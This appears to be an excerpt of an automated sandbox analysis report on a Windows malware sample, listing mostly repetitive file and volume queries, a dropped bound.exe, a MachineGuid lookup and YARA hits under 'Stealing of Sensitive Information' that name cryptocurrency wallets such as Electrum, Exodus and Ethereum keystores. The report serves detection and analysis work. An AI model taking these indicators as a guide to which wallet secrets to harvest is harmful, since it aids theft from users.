                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_hashlib.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_queue.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\bound.blank VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\bound.blank VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\unicodedata.pyd VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe; Code function: 0_2_00007FF7EAD0D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe; Code function: 0_2_00007FF7EAD25C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.29.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.29.dr; Binary or memory string: msmpeng.exe
Source: Amcache.hve.29.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.29.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.29.dr; Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match; File source: 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1393387910.000001C12B872000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1407872022.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1393387910.000001C12B874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7612, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7664, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\_MEI76122\rarreg.key, type: DROPPED
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Electrum
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Jaxxz
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Exodusz
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Ethereum
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: keystore
